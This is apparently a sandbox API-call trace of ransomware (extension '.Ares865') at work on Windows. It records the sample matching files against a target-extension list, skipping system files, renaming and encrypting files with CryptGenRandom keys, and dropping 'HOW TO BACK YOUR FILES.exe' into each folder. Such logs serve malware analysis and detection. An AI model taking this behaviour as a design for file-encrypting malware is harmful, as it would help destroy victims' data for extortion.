(lpString="vcredist_x86.exe") returned 16 [0082.876] lstrlenW (lpString="bak") returned 3 [0082.876] lstrcmpiW (lpString1="exe", lpString2="bak") returned 1 [0082.876] lstrlenW (lpString="ba_") returned 3 [0082.876] lstrcmpiW (lpString1="exe", lpString2="ba_") returned 1 [0082.876] lstrlenW (lpString="dbb") returned 3 [0082.876] lstrcmpiW (lpString1="exe", lpString2="dbb") returned 1 [0082.876] lstrlenW (lpString="vmdk") returned 4 [0082.876] lstrcmpiW (lpString1=".exe", lpString2="vmdk") returned -1 [0082.876] lstrlenW (lpString="rar") returned 3 [0082.876] lstrcmpiW (lpString1="exe", lpString2="rar") returned -1 [0082.876] lstrlenW (lpString="zip") returned 3 [0082.876] lstrcmpiW (lpString1="exe", lpString2="zip") returned -1 [0082.876] lstrlenW (lpString="tgz") returned 3 [0082.876] lstrcmpiW (lpString1="exe", lpString2="tgz") returned -1 [0082.876] lstrlenW (lpString="vbox") returned 4 [0082.876] lstrcmpiW (lpString1=".exe", lpString2="vbox") returned -1 [0082.876] lstrlenW (lpString="vdi") returned 3 [0082.876] lstrcmpiW (lpString1="exe", lpString2="vdi") returned -1 [0082.876] lstrlenW (lpString="vhd") returned 3 [0082.876] lstrcmpiW (lpString1="exe", lpString2="vhd") returned -1 [0082.876] lstrlenW (lpString="vhdx") returned 4 [0082.876] lstrcmpiW (lpString1=".exe", lpString2="vhdx") returned -1 [0082.876] lstrlenW (lpString="avhd") returned 4 [0082.876] lstrcmpiW (lpString1=".exe", lpString2="avhd") returned -1 [0082.876] lstrlenW (lpString="db") returned 2 [0082.876] lstrcmpiW (lpString1="xe", lpString2="db") returned 1 [0082.876] lstrlenW (lpString="db2") returned 3 [0082.876] lstrcmpiW (lpString1="exe", lpString2="db2") returned 1 [0082.876] lstrlenW (lpString="db3") returned 3 [0082.876] lstrcmpiW (lpString1="exe", lpString2="db3") returned 1 [0082.876] lstrlenW (lpString="dbf") returned 3 [0082.876] lstrcmpiW (lpString1="exe", lpString2="dbf") returned 1 [0082.876] lstrlenW (lpString="mdf") returned 3 [0082.876] lstrcmpiW (lpString1="exe", lpString2="mdf") returned -1 [0082.876] lstrlenW (lpString="mdb") returned 3 [0082.876] lstrcmpiW (lpString1="exe", lpString2="mdb") returned -1 [0082.876] lstrlenW (lpString="sql") returned 3 [0082.876] lstrcmpiW (lpString1="exe", lpString2="sql") returned -1 [0082.877] lstrlenW (lpString="sqlite") returned 6 [0082.877] lstrcmpiW (lpString1="86.exe", lpString2="sqlite") returned -1 [0082.877] lstrlenW (lpString="sqlite3") returned 7 [0082.877] lstrcmpiW (lpString1="x86.exe", lpString2="sqlite3") returned 1 [0082.877] lstrlenW (lpString="sqlitedb") returned 8 [0082.877] lstrcmpiW (lpString1="_x86.exe", lpString2="sqlitedb") returned -1 [0082.877] lstrlenW (lpString="xml") returned 3 [0082.877] lstrcmpiW (lpString1="exe", lpString2="xml") returned -1 [0082.877] lstrlenW (lpString="$er") returned 3 [0082.877] lstrcmpiW (lpString1="exe", lpString2="$er") returned 1 [0082.877] lstrlenW (lpString="4dd") returned 3 [0082.877] lstrcmpiW (lpString1="exe", lpString2="4dd") returned 1 [0082.877] lstrlenW (lpString="4dl") returned 3 [0082.877] lstrcmpiW (lpString1="exe", lpString2="4dl") returned 1 [0082.877] lstrlenW (lpString="^^^") returned 3 [0082.877] lstrcmpiW (lpString1="exe", lpString2="^^^") returned 1 [0082.877] lstrlenW (lpString="abs") returned 3 [0082.877] lstrcmpiW (lpString1="exe", lpString2="abs") returned 1 [0082.877] lstrlenW (lpString="abx") returned 3 [0082.877] lstrcmpiW (lpString1="exe", lpString2="abx") returned 1 [0082.877] lstrlenW (lpString="accdb") returned 5 [0082.877] lstrcmpiW (lpString1="6.exe", lpString2="accdb") returned -1 [0082.877] lstrlenW (lpString="accdc") returned 5 [0082.877] lstrcmpiW (lpString1="6.exe", lpString2="accdc") returned -1 [0082.877] lstrlenW (lpString="accde") returned 5 [0082.877] lstrcmpiW (lpString1="6.exe", lpString2="accde") returned -1 [0082.877] lstrlenW (lpString="accdr") returned 5 [0082.877] lstrcmpiW (lpString1="6.exe", lpString2="accdr") returned -1 [0082.877] lstrlenW (lpString="accdt") returned 5 [0082.877] lstrcmpiW (lpString1="6.exe", lpString2="accdt") returned -1 [0082.877] lstrlenW (lpString="accdw") returned 5 [0082.877] lstrcmpiW (lpString1="6.exe", lpString2="accdw") returned -1 [0082.877] lstrlenW (lpString="accft") returned 5 [0082.877] lstrcmpiW (lpString1="6.exe", lpString2="accft") returned -1 [0082.878] lstrlenW (lpString="adb") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0082.878] lstrlenW (lpString="adb") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0082.878] lstrlenW (lpString="ade") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="ade") returned 1 [0082.878] lstrlenW (lpString="adf") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="adf") returned 1 [0082.878] lstrlenW (lpString="adn") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="adn") returned 1 [0082.878] lstrlenW (lpString="adp") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="adp") returned 1 [0082.878] lstrlenW (lpString="alf") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="alf") returned 1 [0082.878] lstrlenW (lpString="ask") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="ask") returned 1 [0082.878] lstrlenW (lpString="btr") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="btr") returned 1 [0082.878] lstrlenW (lpString="cat") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="cat") returned 1 [0082.878] lstrlenW (lpString="cdb") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="cdb") returned 1 [0082.878] lstrlenW (lpString="ckp") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="ckp") returned 1 [0082.878] lstrlenW (lpString="cma") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="cma") returned 1 [0082.878] lstrlenW (lpString="cpd") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="cpd") returned 1 [0082.878] lstrlenW (lpString="dacpac") returned 6 [0082.878] lstrcmpiW (lpString1="86.exe", lpString2="dacpac") returned -1 [0082.878] lstrlenW (lpString="dad") returned 3 [0082.878] lstrcmpiW (lpString1="exe", lpString2="dad") returned 1 [0082.878] lstrlenW (lpString="dadiagrams") returned 10 [0082.878] lstrcmpiW (lpString1="st_x86.exe", lpString2="dadiagrams") returned 1 [0082.878] lstrlenW (lpString="daschema") returned 8 [0082.878] lstrcmpiW (lpString1="_x86.exe", lpString2="daschema") returned -1 [0082.878] lstrlenW (lpString="db-journal") returned 10 [0082.879] lstrcmpiW (lpString1="st_x86.exe", lpString2="db-journal") returned 1 [0082.879] lstrlenW (lpString="db-shm") returned 6 [0082.879] lstrcmpiW (lpString1="86.exe", lpString2="db-shm") returned -1 [0082.879] lstrlenW (lpString="db-wal") returned 6 [0082.879] lstrcmpiW (lpString1="86.exe", lpString2="db-wal") returned -1 [0082.879] lstrlenW (lpString="dbc") returned 3 [0082.879] lstrcmpiW (lpString1="exe", lpString2="dbc") returned 1 [0082.879] lstrlenW (lpString="dbs") returned 3 [0082.879] lstrcmpiW (lpString1="exe", lpString2="dbs") returned 1 [0082.879] lstrlenW (lpString="dbt") returned 3 [0082.879] lstrcmpiW (lpString1="exe", lpString2="dbt") returned 1 [0082.879] lstrlenW (lpString="dbv") returned 3 [0082.879] lstrcmpiW (lpString1="exe", lpString2="dbv") returned 1 [0082.879] lstrlenW (lpString="dbx") returned 3 [0082.879] lstrcmpiW (lpString1="exe", lpString2="dbx") returned 1 [0082.879] lstrlenW (lpString="dcb") returned 3 [0082.879] lstrcmpiW (lpString1="exe", lpString2="dcb") returned 1 [0082.879] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.Ares865") returned 96 [0082.879] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.Ares865" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.ares865"), dwFlags=0x1) returned 1 [0082.880] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.Ares865" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0082.880] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=455720) returned 1 [0082.880] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0082.881] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0082.881] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0082.881] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0082.882] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0082.882] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0082.882] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f730, lpName=0x0) returned 0x15c [0082.883] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f730) returned 0x420000 [0082.910] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0082.911] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0082.911] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0082.911] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0082.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0082.911] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0082.911] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0082.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0082.911] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0082.911] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0082.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0082.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0082.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0082.912] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0082.916] CloseHandle (hObject=0x15c) returned 1 [0082.916] CloseHandle (hObject=0x118) returned 1 [0082.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0082.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0082.916] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0082.918] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd0b340, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xd3ea4f80, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0082.918] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0082.918] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0082.918] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0082.918] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0082.918] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0082.918] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned 82 [0082.918] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0082.918] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0082.918] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\how to back your files.exe"), bFailIfExists=1) returned 0 [0082.919] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0082.919] GetLastError () returned 0x0 [0082.919] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0082.919] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0082.920] CloseHandle (hObject=0x120) returned 1 [0082.920] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0082.920] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0082.920] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0082.920] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.920] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0082.920] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.920] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.920] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.920] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0082.920] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.920] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.920] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c27d800, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0082.920] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0082.920] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0082.920] lstrcmpiW (lpString1="packages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0082.920] lstrcmpiW (lpString1="packages", lpString2="aoldtz.exe") returned 1 [0082.920] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0082.920] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0082.920] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0082.920] lstrcmpiW (lpString1="packages", lpString2="bootmgr") returned 1 [0082.920] lstrcmpiW (lpString1="packages", lpString2="temp") returned -1 [0082.920] lstrcmpiW (lpString1="packages", lpString2="pagefile.sys") returned -1 [0082.920] lstrcmpiW (lpString1="packages", lpString2="boot") returned 1 [0082.920] lstrcmpiW (lpString1="packages", lpString2="ids.txt") returned 1 [0082.920] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0082.921] lstrcmpiW (lpString1="packages", lpString2="perflogs") returned -1 [0082.921] lstrcmpiW (lpString1="packages", lpString2="MSBuild") returned 1 [0082.921] lstrlenW (lpString="packages") returned 8 [0082.921] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*") returned 84 [0082.921] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="packages" | out: lpString1="packages") returned="packages" [0082.921] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0082.921] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb8) returned 0x2f2fc8 [0082.921] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0082.921] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0082.921] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0082.921] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0082.921] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0082.921] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0082.921] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0082.921] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned 91 [0082.921] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0082.921] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0082.921] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0082.922] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0082.922] GetLastError () returned 0x0 [0082.922] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0082.922] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0082.922] CloseHandle (hObject=0x120) returned 1 [0082.922] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0082.922] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0082.922] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0082.922] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.922] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0082.922] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.922] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.922] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0082.922] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0082.922] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.922] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.922] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c27d800, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0082.923] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0082.923] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0082.923] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0082.923] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="aoldtz.exe") returned 1 [0082.923] lstrcmpiW 